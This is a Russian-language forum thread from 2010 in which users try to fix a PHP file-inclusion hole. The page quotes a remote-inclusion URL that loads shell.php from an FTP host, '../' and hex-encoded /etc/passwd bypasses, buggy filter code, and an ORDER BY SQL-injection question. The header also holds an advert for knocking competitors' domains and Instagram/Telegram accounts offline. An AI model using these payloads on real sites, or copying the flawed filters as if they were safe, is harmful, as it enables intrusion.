УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1194 из 1393

1194

Опции темы

Поиск в этой теме

Опции просмотра

#11931

12.03.2010, 13:37

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Jokester

Угу, этот способ просто класс

file.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

PS Я так полагаю в str_replace ты просто опечатался, как и в '\', а то вообще работать не будет.

почему? точка вырезается же, с ftp не проканает.

А "\" вырезается, чтобы не передать в хексе путь

\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 = /etc/passwd

Про опечатку - действительно два слеша надо, т.к. экранирование.

PHP код:


		
			
<? 

if ($page=="") { 

$page="any.php"; 

include($page); 

}else{ 

str_replace('.', '', $page); 

str_replace('/', '', $page); // прямые тоже  вырезать

str_replace('\\', '', $page); 

if(file_exists($page)){ 

include($page); 

} 

} 

?>

Последний раз редактировалось попугай; 12.03.2010 в 13:55..

#11932

12.03.2010, 14:21

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

попугай, ничего твой "фильтр" не вырезает. Проверь сам

PHP код:


		
			
if ($page=="") {  

$page="any.php";  

include($page);  

}else{  

str_replace('.', '', $page);  

str_replace('/', '', $page); // прямые тоже  вырезать 

str_replace('\\', '', $page);  

if(file_exists($page)){  

include($page);  

}  

}



//test.php?page=../xek.txt

//test.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

Проверял бы..

#11933

12.03.2010, 14:52

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от .:[melkiy]:.

попугай, ничего твой "фильтр" не вырезает. Проверь сам

PHP код:


		
			
if ($page=="") {  

$page="any.php";  

include($page);  

}else{  

str_replace('.', '', $page);  

str_replace('/', '', $page); // прямые тоже  вырезать 

str_replace('\\', '', $page);  

if(file_exists($page)){  

include($page);  

}  

}



//test.php?page=../xek.txt

//test.php?page=ftp://vasa:qwerty@ftp.narod.ru/shell.php

Проверял бы..

PHP код:


		
			
$page = $_GET['page'];

добавь

Да, надо переменной присваивать результат str_replace. Написал просто в общем виде алгоритм, над правильностью кода не задумывался поначалу.

Вот так будет полностью в-общем.

PHP код:


		
			
<?php

$page = $_GET['page'];



if ($page=="") {   

$page="any.php";   

include($page);   

}else{   

$page = str_replace('.', '', $page);   

$page = str_replace('/', '', $page); 

$page = str_replace(':', '', $page);   

$page = str_replace('\\', '', $page);   

if(file_exists($page)){   

include($page);   

}   

}

?>

Strilo4ka, да это не идея, это обычная практика.

Последний раз редактировалось попугай; 12.03.2010 в 15:17..

#11934

12.03.2010, 17:16

Jerri

Участник форума

Регистрация: 12.07.2009

Сообщений: 158

Провел на форуме:
2510517

Репутация: 334

Отправить сообщение для Jerri с помощью ICQ

Есть запрос -

Код:

... GROUP BY f.id ORDER BY [сюда можем впихнуть что хотим] LIMIT 0, 15

Можно ли провести sql-inj , и как?

#11935

12.03.2010, 17:37

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от Jerri

Есть запрос -

Код:

... GROUP BY f.id ORDER BY [сюда можем впихнуть что хотим] LIMIT 0, 15

Можно ли провести sql-inj , и как?

Инъекция после order by
_http://www.securitylab.ru/contest/212101.php

#11936

12.03.2010, 20:48

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от попугай

PHP код:


		
			
$page = $_GET['page'];

PHP код:


		
			
<?php

$page = $_GET['page'];



if ($page=="") {   

$page="any.php";   

include($page);   

}else{   

$page = str_replace('.', '', $page);   

$page = str_replace('/', '', $page); 

$page = str_replace(':', '', $page);   

$page = str_replace('\\', '', $page);   

if(file_exists($page)){   

include($page);   

}   

}

?>

Strilo4ka, да это не идея, это обычная практика.

в принципе да помогло инклуда больше нету...
но теперь неоткрываются другие странички
http://www.site.ru/index.php?page=activ.htm
http://www.site.ru/index.php?page=presentations.htm
вопрос как их туда добавить? чет у меня не получилось пока....

#11937

12.03.2010, 21:36

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от 547

А зачем делать через зад, если вот дали нормальный вариант:
https://forum.antichat.ru/showpost.php?p=1973181&postcount=12068

Или нужно понаставить фильтров, и думать обойдут их или нет?

#11938

12.03.2010, 21:49

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от Jokester

PHP код:


		
			
<?

$page = $_GET['page'];

if ($page=="") {   



switch($page) {

    case 'page1':

    include("page1.html");

    break;



    case 'page2':

    include("page2.html");

    break;



    case 'page3':

    include("page3.html");

    break;



    ...

     

    default:

    include("home.html");

    break;

}  

?>

да я так поначалу и пробовал,но!!!

parse error: syntax error, unexpected '.' in /web/clients/index.php

#11939

12.03.2010, 21:55

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)

#11940

12.03.2010, 22:08

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

Цитата:

Сообщение от Pashkela

посчитай фигурные скобки, вообще проверь код (надеюсь троеточие догадался удалить)

да там одна лишняя фигурная

но всеравно странички которые написал вместо xxx.htm неоткрываются вместо них просто пустое место....

PHP код:


		
			
case 'page1':

include("xxx.htm");

    break;



    case 'page2':

    include("xxxx.htm");

    break;

Страница 1194 из 1393

1194

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход